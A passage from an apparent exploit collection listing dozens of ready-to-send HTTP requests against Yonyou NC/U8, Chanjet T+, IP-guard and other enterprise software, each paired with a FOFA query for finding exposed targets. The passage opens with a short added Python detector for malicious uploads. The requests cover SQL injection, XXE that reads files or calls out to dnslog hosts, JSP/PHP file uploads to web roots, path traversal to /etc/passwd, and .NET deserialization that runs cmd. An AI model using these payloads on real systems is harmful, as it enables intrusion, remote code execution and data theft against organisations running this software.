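Added example (not from the original article and not Yonyou's or Landray's code): a check for upload bodies shaped like entries 10 and 24, built on the standard-library MIME parser so it needs no third-party package. It flags a plain form field whose value is a filesystem path ending in a web-executable extension (the fname field above tells accept.jsp where to write the file) and a file part whose bytes contain a JSP or PHP scriptlet regardless of the declared text/plain type or the .txt extension. The boundary, field names and both bodies are constructed for the example.

```python
import email
import re
from typing import List, Optional, Tuple

WEB_EXEC_EXT = re.compile(r"\.(jspx?|php\d?|aspx?|ashx|asmx)$", re.I)
SCRIPT_MARKERS = (b"<%", b"<?php", b"<?=")


def parse_multipart(content_type: str, body: bytes) -> List[Tuple[Optional[str], Optional[str], str, bytes]]:
    """Split a raw multipart/form-data body into
    (field name, filename or None, declared content type, payload bytes)
    using the stdlib email parser, which handles multipart MIME generically."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw)
    parts = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_param("name", header="content-disposition")
        payload = part.get_payload(decode=True) or b""
        parts.append((name, part.get_filename(), part.get_content_type(), payload))
    return parts


def inspect_upload(content_type: str, body: bytes) -> List[str]:
    """Return sorted finding labels for one upload body (empty if clean)."""
    findings = set()
    for name, filename, _ctype, payload in parse_multipart(content_type, body):
        if filename is None:
            # A plain field carrying a path with a web-executable extension:
            # in entry 24 the fname field chooses where the server writes the upload.
            value = payload.decode("latin-1").strip()
            if WEB_EXEC_EXT.search(value) and ("/" in value or "\\" in value):
                findings.add(f"server-path-field:{name}")
        elif any(marker in payload for marker in SCRIPT_MARKERS):
            # Script source inside a file part, whatever the declared type or extension says.
            findings.add(f"script-in-upload:{filename}")
    return sorted(findings)


BOUNDARY = "----WebKitFormBoundaryExample"          # constructed
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"

# Constructed body in the shape of entry 24: a .txt upload holding a JSP
# scriptlet plus a client-chosen server-side path.
MALICIOUS_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload"; filename="notes.txt"\r\n'
    "Content-Type: text/plain\r\n"
    "\r\n"
    '<% out.println("marker"); %>\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="fname"\r\n'
    "\r\n"
    "\\webapps\\nc_web\\shell.jsp\r\n"
    f"--{BOUNDARY}--\r\n"
).encode("ascii")

# Constructed benign control: an ordinary text attachment and a title field.
BENIGN_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="upload"; filename="notes.txt"\r\n'
    "Content-Type: text/plain\r\n"
    "\r\n"
    "Quarterly figures attached.\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="title"\r\n'
    "\r\n"
    "Q3 report\r\n"
    f"--{BOUNDARY}--\r\n"
).encode("ascii")

if __name__ == "__main__":
    print(inspect_upload(CONTENT_TYPE, MALICIOUS_BODY))
    print(inspect_upload(CONTENT_TYPE, BENIGN_BODY))
```

The check is deliberately content-based: a filename allow-list would have passed entry 24, since the upload is a .txt file; what makes it dangerous is the scriptlet inside it together with the separate field that renames it to .jsp under the web root.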
25. 用友NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友 NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友NC runStateServlet SQL injection
version: <=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. 用友NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. 用友U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. 用友GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. 用友U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空社会化商业ERP系统 validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; the command writes the given string into the specified file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
    "storeID":{
        "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName":"Start",
        "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo":{
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd",
                "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
            }
        }
    }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
    "storeID":{
        "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName":"Start",
        "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo": {
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
            }
        }
    }
}

57. 畅捷通T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fus/ion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

